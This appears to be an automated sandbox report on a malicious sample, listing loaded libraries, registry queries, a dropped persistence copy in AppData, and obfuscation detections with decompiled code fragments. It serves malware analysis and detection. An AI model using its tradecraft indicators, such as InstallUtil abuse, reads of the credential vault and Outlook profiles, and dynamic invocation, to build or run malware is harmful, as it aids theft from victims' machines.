                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: msisip.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: wshext.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ifsutil.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: atl.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: msisip.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: wshext.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: 87M9Y3P4Z7.batStatic file information: File size 1410688 > 1048576
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006797000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004FC9000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289959595.0000000008940000.00000004.08000000.00040000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D7A000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000056C4000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E1D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006797000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004FC9000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289959595.0000000008940000.00000004.08000000.00040000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D7A000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000056C4000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E1D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: powershell.pdbUGP source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000000.2230623116.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, ChannelUris.bat.Zhe, 00000013.00000000.2381194622.0000000000248000.00000020.00000001.01000000.00000009.sdmp, ChannelUris.bat.Zhe.17.dr, 87M9Y3P4Z7.bat.Zhe.5.dr
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: powershell.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000000.2230623116.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, ChannelUris.bat.Zhe, 00000013.00000000.2381194622.0000000000248000.00000020.00000001.01000000.00000009.sdmp, ChannelUris.bat.Zhe.17.dr, 87M9Y3P4Z7.bat.Zhe.5.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.cs.Net Code: Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777252)),Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777284))})
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.cs.Net Code: Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777252)),Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777284))})
                    .NET source code contains potential unpacker
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6687238.8.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6687238.8.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6687238.8.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6687238.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6687238.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 7.2.87M9Y3P4Z7.bat.Zhe.8820000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.ChannelUris.bat.Zhe.6a58920.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.ChannelUris.bat.Zhe.6966d00.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.ChannelUris.bat.Zhe.68750d8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.87M9Y3P4Z7.bat.Zhe.60525e8.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2288766679.0000000008820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2262903919.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2444515974.0000000006783000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_028BA306 push ecx; retf 7_2_028BA312
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_088CBEEA push eax; retf 7_2_088CBF09
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_089B62EC push cs; iretd 7_2_089B62EF
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_08C380FC push E8080A53h; ret 7_2_08C38101
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheCode function: 7_2_08C3615B push E8080A6Ah; iretd 7_2_08C36160
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00C4EF9E pushad ; ret 8_2_00C4EFA5
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_04B1A30C push ecx; retf 19_2_04B1A312
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_093A4C09 pushad ; retf 19_2_093A4C0F
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheCode function: 19_2_093A62EC push cs; iretd 19_2_093A62EF
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, WpavyhD7EdUgfohP8Q0.csHigh entropy of concatenated method names: 'x0lDIWOJpP', 'PYJDheQoZC', 'qX9DPCkq92', 'rpoDndqSOs', 'mi8D2tqBZW', 'uCWDXQiVFI', 'WoyD32l1sa', 'oDSDyiJoUq', 'bQUDtuo6Cl', 'eCaDpKrHeM'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'LNJUmKKgiEWpS3nf41K'
